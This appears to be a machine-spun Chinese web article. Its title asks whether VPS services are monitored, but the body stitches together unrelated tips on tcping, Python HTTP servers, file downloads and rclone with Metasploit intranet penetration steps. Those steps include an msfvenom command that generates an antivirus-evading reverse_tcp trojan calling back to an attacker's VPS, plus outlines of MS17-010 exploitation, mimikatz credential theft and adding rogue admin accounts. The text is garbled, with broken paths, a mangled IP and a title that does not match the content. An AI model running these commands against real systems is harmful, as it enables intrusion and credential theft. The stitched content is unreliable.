深度解析,VPS服务是否真的存在监听与监控风险
装VPS会被监听吗?
1、您需要下载一个名为tcping的软件,并将其放置在C:windowssystem32目录下,该软件能够监控服务器端口的状态,默认为80端口,但也可以指定其他端口,通过观察ping返回的时间,您可以判断服务器是否存在延时或端口不通的情况,安装完成后,直接在C:WINDOWSsystem32目录下运行该软件。
2、简易HTTP服务器(SimpleHTTPServer)是许多主流Linux发行版自带的Python环境中的一个内置功能,无需额外安装,您可以通过执行命令`python -m http.server`来启动服务,并指定目录,/home/share`,在Python 3环境下,该功能被整合至`http.server`模块,命令也有所调整,默认情况下,它会监听8000端口,您可以通过IP地址加端口(如:IP:8000)来访问。
3、在特定的网络环境和服务器配置下,例如Windows Server 2012作为Web服务器,JDK版本为8u131(119222),VPS为Ubuntu 18.04 LTS,攻击者可能会利用这些配置中的漏洞,在VPS上准备相关文件并启动监听服务,然后利用VPS上的Python服务器响应恶意的XStream payload,同时启动脚本和监听服务。

4、生成一个免杀的MSF木马,可以使用命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f exe > exp.exe,其中LHOST是您的VPS地址,LPORT是您要监听的端口。
几种快速下载VPS文件的方法
1、下载国外网盘文件目前有以下几种方法:通过免费的国外网盘中转站下载,但每次只能下载一个文件,存在一定限制;购买支持下载的国外VPN进行下载;购买国外VPS进行下载;通过淘宝找人代下国外网盘文件,通常按文件大小计费,后三种方法都需要支付费用,而免费的代理通常效果不佳。
2、如果您只需要查看或下载文件,可以在VPS上安装FTP服务,将文件放置在FTP目录中,然后通过本地电脑上的FTP客户端进行查看或下载,如果您想以网站形式展示文件,需要在服务器上安装IIS来搭建网站。
3、首先远程登录VPS,如果文件较多,可以使用压缩软件将它们打包成一个压缩文件,下载可以通过HTTP或FTP方式完成,如果使用HTTP方式,需要在服务器上安装IIS;如果使用FTP方式,需要在服务器上安装FTP软件,将压缩文件放置在Web目录或FTP目录中即可。
4、下载并安装一个支持SSH协议的客户端应用程序,如Termius、JuiceSSH等,这些应用程序可在应用商店中找到,打开SSH客户端应用程序,创建一个新的SSH连接配置,输入VPS的IP地址(或域名)、端口号以及登录凭证(用户名和密码或私钥),保存配置并连接到远程VPS。
5、从本地电脑上传文件到VPS或服务器有多种方法,如果文件不大,可以在远程登录服务器的选项中选择“本地资源”,将本地磁盘映射到服务器上,然后直接将文件复制到服务器磁盘,也可以将文件压缩后,通过发送邮件附件的方式上传到VPS。
6、将谷歌盘挂载到VPS:首先安装fuse:`apt install fuse -y`;然后创建挂载目录:`mkdir /gd`;接着配置Rclone:`wget zhujitips.com/sh/rclone... && nano rcloned`,确保配置文件中的名称、远程文件夹路径与本地挂载路径正确无误,配置完成后,设置自启动功能以确保服务始终运行。
实战MSF内网渗透
1、在内网渗透过程中,通常会设置代理后首先尝试利用ms17-010漏洞,在实战中,使用msf的ms17-010模块时,可能会遇到无法成功反弹shell的情况,为了成功利用ms17-010,在msf成功接收session后,需要添加路由,并使用ms17-010相关模块进行漏洞探测,尝试将LHOST配置为公网IP,观察是否出现success提示。
2、在没有Cobalt Strike工具的情况下,可以选择使用Metasploit Framework (MSF) 进行内网渗透,以下步骤包括生成木马、监听端口、上线目标、进程迁移、信息收集、主机探测与存活扫描,以及域控操作的全过程。
3、使用MSF生成木马并进行监听是基本操作之一,生成木马后,通过访问生成的木马文件即可上线控制目标系统,具体操作步骤如下:执行生成木马的命令,然后通过访问木马文件上线,在模拟内网场景中,通过MSF进行复现,以攻破win7主机为例,展示MSF在实际渗透过程中的应用。
4、在DC-1靶机实战中,首先查看网络配置和网卡信息,发现靶机使用NAT模式运行,并获取其MAC地址,然后使用nmap工具扫描内网网段,通过命令`nmap -sP 1916144/24 -oN nmap.Sp`获取靶机的IP地址。
5、在内网域渗透分析的实战中,构建一个严谨的测试环境是首要任务,我们使用VMware搭建双网卡web服务器,将互联网与内网分隔,并通过VMnet3配置方便渗透测试,首先通过Nmap扫描发现web服务器的漏洞,如弱口令或上传漏洞,进而利用webshell。
6、针对域内服务器Mssql的攻击流程包括使用mimikatz工具抓取账号密码、添加路由、利用MS17-010漏洞进行攻击以获得更高权限、使用CLR组件提权,添加管理员账户并加入admin组,最后上线MSF进行内网渗透,本文通过实际操作展示了红队在多层内网环境下的渗透测试方法,涉及多种技术与策略。